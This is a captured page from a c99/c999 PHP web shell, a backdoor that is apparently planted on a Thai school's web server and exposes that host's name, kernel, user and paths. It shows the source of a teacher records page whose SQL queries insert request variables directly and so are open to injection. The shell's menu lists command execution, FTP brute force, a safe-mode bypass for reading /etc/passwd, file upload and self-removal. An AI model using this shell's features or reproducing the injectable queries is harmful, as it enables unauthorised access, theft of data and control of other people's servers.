!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     BookByYear.php (5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("../include/FunctionDB.php");
include(
"admin_menu.php");
 
ConnectDB();
$strSQL "SELECT * FROM  bookmant_tb  Where   Teacher_code='$Teacher_code'  GROUP By  Year ";
$result mysql_query($strSQL); 
$num mysql_num_rows($result );

?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620"><table width="740" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td height="199"><td><br><fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="../menu_teacher.php " >หน้าหลัก</a> <img src="../../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="EditBookList.php">แก้ไข้อมูลงานสารบรรณ</a><img src="../../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="addBook.php">เพิ่มข้อมูลหนังสือ รับ-ส่ง</a></font></legend>
            <label><div align="center">
              <form id="form1" name="form1" method="post" action="">
                <table width="60%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#999999" style="background-color:#eeeeee; border:1px solid gray"size="12">
                  <tr>
                    <td height="25" colspan="3"  background="../../../Image/bdevel.jpg"><div align="center"><font color="#993333" size="4" face="Tahoma"><strong>แสดงข้อมูลงานสารบรรณรายปี</strong></font></div></td>
                  </tr>
                  <tr bgcolor="#CCCCCC">
                    <td width="6%" bordercolor="#999966" style="border:1px solid gray"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">No.</font></strong></div></td>
                    <td width="26%" bordercolor="#999966" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">ปีงบประมาณ</font></strong></div></td>
                    <td width="68%" bordercolor="#999966" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">จำนวนรายการทั้งหมด 
                      / ปี</font></strong></div></td>
                  </tr>
                  <?php
$i 
1;
 while(
$row mysql_fetch_array($result))
 {

     if(
$count==0)
     {
?>
                  <tr >
                    <td align="center" bgcolor="#F7F7F7" ><strong><font color="#996600" size="2" face="Tahoma">
                      <?=$i?>
                    </font></strong></td>
                    <td align="center" bgcolor="#F7F7F7" ><div align="center"><strong><font color="#996600" size="2" face="Tahoma"> </font><font color="#990099" size="2" face="Tahoma"><a href="BookList.php?Teacher_code=<?=$row[Teacher_code]?>&Year=<?=$row["Year"]?>"title="Click to see Detail" class="d">
                        <?=$row["Year"]?>
                    </a></font><font color="#996600" size="2" face="Tahoma"></a><a href="../ProjectList.php?Budget_Year=<?=$row["Budget_Year"]?>" title="Click to see Detail" class="d"></a> </font></strong></div></td>
                    <td align="center" bgcolor="#F7F7F7" ><strong><font color="#996600" size="2" face="Tahoma">
                      <?php
    $Year 
$row[Year];
    
$sql1 "Select * From  bookmant_tb   Where  Teacher_code='$Teacher_code'  and  Year='$Year'";
    
$result1 mysql_query($sql1);
    
$countnum mysql_num_rows($result1);
     echo 
$countnum;
    
    
?> 
                    </font></strong><font color="#996600" size="2" face="Tahoma">รายการ</font> </td>
                  </tr>
                  <?
    $count
=1;
     }
else
{
?>
                  <tr>
                    <td align="center" bordercolor="#999966" bgcolor="#FFFFFF" ><strong><font color="#996600" size="2" face="Tahoma">
                      <?=$i?>
                    </font></strong></td>
                    <td height="18" align="center" bgcolor="#FFFFFF" ></font></strong><strong><font color="#990099" size="2" face="Tahoma"><a href="BookList.php?Teacher_code=<?=$row[Teacher_code]?>&Year=<?=$row["Year"]?>"title="Click to see Detail" class="d">
                      <?=$row["Year"]?>
                    </a></font></strong></div></td>
                    <td align="center" bgcolor="#FFFFFF" ><strong><font color="#996600" size="2" face="Tahoma">
                      <?php
    $Year 
$row[Year];
    
$sql1 "Select * From  bookmant_tb Where  Teacher_code='$Teacher_code'  and  Year='$Year'";
    
$result1 mysql_query($sql1);
    
$countnum mysql_num_rows($result1);
     echo 
$countnum;
    
    
?>
                    </font></strong><font color="#996600" size="2" face="Tahoma">รายการ</font> </td>
                  </tr>
                  <?
$count
=0;
}
$i++;
 }    

?>
                  <tr>
                    <td height="25" colspan="3" align="center" background="../../Image/bdevel.jpg"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">ทั้งหมด</font><font color="#993333" size="2" face="Tahoma"> <? echo $num ?></font><font color="#000000" size="2" face="Tahoma"> ปี</font></strong></div></td>
                  </tr>
                </table>
              </form>
              <br>
              <br>
            </div></label>
        </fieldset><br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ<br>
        </font></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--